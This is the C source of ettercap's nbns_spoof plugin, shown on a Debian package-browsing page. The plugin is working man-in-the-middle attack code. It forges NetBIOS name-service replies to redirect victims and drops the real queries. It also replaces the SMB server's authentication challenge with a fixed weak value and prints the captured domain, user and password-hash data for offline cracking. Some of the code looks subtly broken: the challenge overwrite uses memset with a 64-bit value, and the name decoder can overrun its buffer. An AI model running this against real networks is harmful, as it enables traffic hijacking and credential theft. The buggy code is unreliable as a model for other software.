File: nbns_spoof.c

package info (click to toggle)
ettercap 1%3A0.8.1-3%2Bdeb8u1
  • links: PTS, VCS
  • area: main
  • in suites: jessie
  • size: 5,480 kB
  • ctags: 6,501
  • sloc: ansic: 47,187; yacc: 310; lex: 204; makefile: 119; xml: 31; sh: 22
file content (494 lines) | stat: -rw-r--r-- 11,974 bytes parent folder | download | duplicates (2)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
/*
    nbns_spoof -- ettercap plugin -- spoofs NBNS replies

    Copyright (C) Ettercap team
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

*/

#include <ec.h>                        /* required for global variables */
#include <ec_dissect.h>
#include <ec_plugins.h>                /* required for plugin ops */
#include <ec_file.h>
#include <ec_hook.h>
#include <ec_resolv.h>
#include <ec_send.h>

#include <stdlib.h>
#include <string.h>

#define TYPE_NB 0x0020
#define TYPE_NBSTAT 0x0021
#define CLASS_IN 0x0001

#define NBNS_NAME_LEN 34
#define NBNS_DECODED_NAME_LEN 16


/* From LWIP */

#define OPCODE_R 0x8000

/*OPCODE        1-4   Operation specifier:
                         0 = query
                         5 = registration
                         6 = release
                         7 = WACK
                         8 = refresh */

#define OPCODE_MASK             0x7800
#define OPCODE_QUERY            0x0000
#define OPCODE_REGISTRATION 0x2800
#define OPCODE_RELEASE          0x3000
#define OPCODE_WACK                     0x3800
#define OPCODE_REFRESH          0x4000
                                                 

/* NM_FLAGS subfield bits */ 
#define NM_AA_BIT         0x0400  /* Authoritative Answer */
#define NM_TR_BIT         0x0200  /* TRuncation flag      */
#define NM_RD_BIT         0x0100  /* Recursion Desired    */
#define NM_RA_BIT         0x0080  /* Recursion Available  */
#define NM_B_BIT          0x0010  /* Broadcast flag       */

/* Return Codes */
#define RCODE_POS_RSP     0x0000  /* Positive Response    */
#define RCODE_FMT_ERR     0x0001  /* Format Error         */
#define RCODE_SRV_ERR     0x0002  /* Server failure       */ 
#define RCODE_NAM_ERR     0x0003  /* Name Not Found       */ 
#define RCODE_IMP_ERR     0x0004  /* Unsupported request  */
#define RCODE_RFS_ERR     0x0005  /* Refused              */
#define RCODE_ACT_ERR     0x0006  /* Active error         */
#define RCODE_CFT_ERR     0x0007  /* Name in conflict     */
#define RCODE_MASK        0x0007  /* Mask                 */



struct nbns_header {
        u_int16 transactid;     /* Transaction ID */
#ifdef WORDS_BIGENDIAN
        u_char  response: 1;    /* response or query */
        u_char  opcode: 4;      /* opcode */
        /* nm_flags */
        u_char  aa: 1;
        u_char  tc: 1;
        u_char  rd: 1;
        u_char  ra: 1;
        u_char  unused: 2;
        u_char  broadcast: 1;
        u_char  rcode: 4;      /* RCODE */
#else
        u_char rd: 1;
        u_char tc: 1;
        u_char aa: 1;
        u_char opcode: 4;
        u_char response: 1;
        u_char rcode: 4;
        u_char broadcast: 1;
        u_char unused: 2;
        u_char ra: 1;
#endif
        u_int16 qd_count;       /* QDCOUNT */
        u_int16 an_count;       /* AN_COUNT */
        u_int16 ns_count;       /* NS_COUNT */
        u_int16 ar_count;       /* AR_COUNT */
};

/** NBNS rdata field */

struct nbns_rdata {
  u_int16 len;
  u_int16 nbflags;
  u_int32 addr;
};

#define NBNS_MSGLEN_QUERY_RESPONSE 70
#define NBNS_TTL_POS 12+1+NBNS_NAME_LEN+1+2+2
#define NBNS_RDATA_POS NBNS_TTL_POS + 2
#define NBNS_QUERY_POS 12

struct nbns_query {
	struct nbns_header header;
	char question[NBNS_NAME_LEN];
	u_int16 type;
	u_int16 class;
};

struct nbns_response {
	struct nbns_header header;
	char rr_name[NBNS_NAME_LEN];	/* RR_NAME */
	u_int16 type;
	u_int16 class;
	u_int32 ttl;
	struct nbns_rdata rr_data;
};



struct nbns_spoof_entry {
	char *name;
	struct ip_addr ip; /* no ipv6 nbns */
	SLIST_ENTRY(nbns_spoof_entry) next;
};

static SLIST_HEAD(, nbns_spoof_entry) nbns_spoof_head;

/* 
 * SMB portion
 */

typedef struct {
   u_char  proto[4];
   u_char  cmd;
   u_char  err[4];
   u_char  flags1;
   u_short flags2;
   u_short pad[6];
   u_short tid, pid, uid, mid;
} SMB_header;

typedef struct {
   u_char  mesg;
   u_char  flags;
   u_short len;
} NetBIOS_header;

#define IF_IN_PCK(x,y) if((x) >= y->packet && (x) < (y->packet + y->len) )


/* protos */
int plugin_load(void *);
static int nbns_spoof_init(void *);
static int nbns_spoof_fini(void *);
static int load_db(void);
static void nbns_spoof(struct packet_object *po);
static void nbns_set_challenge(struct packet_object *po);
static void nbns_print_jripper(struct packet_object *po);
static int parse_line(const char *str, int line, char **ip_p, char **name_p);
static int nbns_expand(char *compressed, char *dst);
static int get_spoofed_nbns(const char *a, struct ip_addr **ip);
static void nbns_spoof_dump(void);

struct plugin_ops nbns_spoof_ops = {
	/* ettercap version must be the global EC_VERSION */
	.ettercap_version =  	EC_VERSION,
	.name = 			"nbns_spoof",
	.info = 			"Sends spoof NBNS replies & sends SMB challenges with custom challenge",
	.version = 			"1.1",
	.init = 			&nbns_spoof_init,
	.fini = 			&nbns_spoof_fini,	
};

int plugin_load(void *handle)
{
	if (load_db() != E_SUCCESS)
		return -E_INVALID;

	nbns_spoof_dump();
	return plugin_register(handle, &nbns_spoof_ops);
}

static int nbns_spoof_init(void *dummy)
{
   /* variable not used */
   (void) dummy;

	/*
	 * add the hook in the dissector
	 * this will pass only valid NBNS packets
  	 */
	hook_add(HOOK_PROTO_NBNS, &nbns_spoof);
	hook_add(HOOK_PROTO_SMB, &nbns_set_challenge);
	hook_add(HOOK_PROTO_SMB_CMPLT, &nbns_print_jripper);
	return PLUGIN_RUNNING;
}

static int nbns_spoof_fini(void *dummy)
{
   /* variable not used */
   (void) dummy;

	hook_del(HOOK_PROTO_NBNS, &nbns_spoof);
	return PLUGIN_FINISHED;
}

/* load database */
static int load_db(void)
{
	struct nbns_spoof_entry *d;
	struct in_addr ipaddr;
	FILE *f;
	char line[128];
	char *ptr, *ip, *name;
	int lines = 0;

	f = open_data("etc", ETTER_NBNS, FOPEN_READ_TEXT);

	if (f == NULL) {
		USER_MSG("Cannot open %s\n", ETTER_NBNS); return -E_INVALID;
	}
	
	while (fgets(line, 128, f)) {
		/* count lines */
		lines++;
		if ((ptr = strchr(line, '#')))
			*ptr = '\0';


		/* skip empty lines */
		if (!*line || *line == '\r' || *line == '\n')
			continue;

		/* strip apart the line */
		if (!parse_line(line, lines, &ip, &name))
			continue;

		if (inet_aton(ip, &ipaddr) == 0) {
			USER_MSG("%s:%d Invalid IP addres\n", ETTER_NBNS, lines);
			continue;
		}

		/* create the entry */
		SAFE_CALLOC(d, 1, sizeof(struct nbns_spoof_entry));
		
		ip_addr_init(&d->ip, AF_INET, (u_char *)&ipaddr);
		d->name = strdup(name);
	
		/* insert to list */
		SLIST_INSERT_HEAD(&nbns_spoof_head, d, next);
	}

	fclose(f);	
	return E_SUCCESS;
}	

/*
 * Parse line on format "<name> <IP-addr>".
 */
static int parse_line(const char *str, int line, char **ip_p, char **name_p)
{
	static char name[100+1];
	static char ip[20+1];
	
	if(sscanf(str, "%100s %20[^\r\n# ]", name, ip) != 2) {
		USER_MSG("%s:%d Invalid entry %s\n", ETTER_NBNS, line, str);
		return(0);
	}

	if (strchr(ip, ':')) {
		USER_MSG("%s:%d IP address must be IPv4\n", ETTER_NBNS, line);
		return(0);
	}
	
	*name_p = name;
	*ip_p = ip;
	return (1);
}

/*
 * HOOK_POINT SMB
 * Change the challenge sent by the server to something
 * simple that can be decoded by other tools
 */

static void nbns_set_challenge(struct packet_object *po)
{
	u_char *ptr;
	SMB_header *smb;
	NetBIOS_header *NetBIOS;
	
	ptr = po->DATA.data;
	u_int64 SMB_WEAK_CHALLENGE = 0x1122334455667788;

	NetBIOS = (NetBIOS_header *)ptr;
	smb = (SMB_header *)(NetBIOS + 1);

	/* move to data */
	ptr = (u_char *)(smb + 1);

	if (memcmp(smb->proto, "\xffSMB", 4) != 0)
		return;

	if (smb->cmd == 0x72 && FROM_SERVER("smb", po)) {
		if (ptr[3] & 2) {
			/* Check encryption key len */
			if (*ptr != 0) {
				ptr += 3; /* Go to BLOB */
				//memcpy new challenge (8 bytes) to ptr
				memset(ptr, (long)SMB_WEAK_CHALLENGE, 8);
				po->flags |= PO_MODIFIED; /* calculate checksum */
				USER_MSG("nbns_spoof: Modified SMB challenge\n");
			}
		}
	}
}

/*
 * Hook point HOOK_PROTO_SMB_CMPLT
 * receives a packet_object with the
 * SMB username, password, challenge, etc.
 */
static void nbns_print_jripper(struct packet_object *po)
{
	//Domain = po->DISSECTOR.info
	//User = po->DISSECTOR.user
	//Pass = po->DISSECTOR.pass

	/*
         * Thanks to the SMB dissector, po->DISSECTOR.pass contains everything we need but domain
         */
	USER_MSG("%s%s\n", po->DISSECTOR.info, po->DISSECTOR.pass);
}

/* 
 * parse the packet and send the fake reply
 */
static void nbns_spoof(struct packet_object *po)
{
	struct nbns_query *nbns;
	struct nbns_header *header;
	char name[NBNS_DECODED_NAME_LEN];

	//header = (struct nbns_header *)po->DATA.data;
	nbns =  (struct nbns_query *)po->DATA.data;
	header = (struct nbns_header *)&nbns->header;

	if (header->response) {
		/* We only want queries */
		return;
	}

	if (ntohs(nbns->class) != CLASS_IN || ntohs(nbns->type) != TYPE_NB) {
		/* We only handle internet class and NB type */
		return;
	}


	memset(name, '\0', NBNS_DECODED_NAME_LEN);
	nbns_expand(nbns->question, name);

	struct ip_addr *reply;
	char tmp[MAX_ASCII_ADDR_LEN];

	if (get_spoofed_nbns(name, &reply) != E_SUCCESS)
		return;

	u_char *response;

	SAFE_CALLOC(response, NBNS_MSGLEN_QUERY_RESPONSE, sizeof(u_char));

   if (po->DATA.len > 70) {
       SAFE_FREE(response);
       return;
   }
	memset(response, 0, NBNS_MSGLEN_QUERY_RESPONSE);

	memcpy(response, po->DATA.data, po->DATA.len);

	struct nbns_header *hdr = (struct nbns_header*)response;

	hdr->response = 1;
	hdr->opcode = ntohs(OPCODE_R+OPCODE_QUERY);
	hdr->rcode = ntohs(0);
	hdr->broadcast = ntohs(0);
	hdr->an_count = ntohs(1);
	hdr->qd_count = ntohs(0);
	hdr->ra = 0;
	hdr->rd = 0;
	hdr->tc = 0;
	hdr->aa = 1;
	hdr->ns_count = ntohs(0);
	hdr->ar_count = ntohs(0); 
	hdr->transactid = header->transactid;

	u_int16 *ttl1 = (u_int16*)(response+NBNS_TTL_POS);
	u_int16 *ttl2 = (u_int16*)(response+NBNS_TTL_POS+2);

	*ttl1 = ntohs(0);
	*ttl2 = ntohs(0);

	struct nbns_rdata *rdata = (struct nbns_rdata *) (response+NBNS_RDATA_POS);

	rdata->len = ntohs(2+sizeof(u_int32));
	rdata->nbflags = ntohs(0x0000);
	rdata->addr = *reply->addr32;
	
	/* send fake reply */
	send_udp(&GBL_IFACE->ip, &po->L3.src, po->L2.src, po->L4.dst, po->L4.src, response, NBNS_MSGLEN_QUERY_RESPONSE);
	USER_MSG("nbns_spoof: Query [%s] spoofed to [%s]\n", name, ip_addr_ntoa(reply, tmp));

	/* Do not forward request */
	po->flags |= PO_DROPPED;

	SAFE_FREE(response);
	
}


/*
 * return the ip address for the name
 */
static int get_spoofed_nbns(const char *a, struct ip_addr **ip)
{
	struct nbns_spoof_entry *n;

	SLIST_FOREACH(n, &nbns_spoof_head, next) {
		if (match_pattern(a, n->name)) {
			*ip = &n->ip;
			return E_SUCCESS;
		}
	}

	return -E_NOTFOUND;
}

static void nbns_spoof_dump(void)
{
	struct nbns_spoof_entry *n;
	DEBUG_MSG("nbns_spoof entries:");
	SLIST_FOREACH(n, &nbns_spoof_head, next) {
		if(ntohs(n->ip.addr_type) == AF_INET)
      {
			DEBUG_MSG(" %s -> [%s]", n->name, int_ntoa(n->ip.addr32));
      }
	}
}

static int nbns_expand(char *compressed, char *dst)
{
        //format <space>compressed\00
        int len = 0;
        int x=0;
        char j, k;


        for(len = 1; x < NBNS_NAME_LEN; len+=2){
                j = (compressed[len] & 0x3f)-1;
                k = (compressed[len+1] & 0x3f)-1;
                dst[x/2] = (j<<4)+(k);
                x+=2;
        }

	char *s = strstr(dst, " ");

	if (s)
		*s = '\0';
        return len;

}


// vim:ts=3:expandtab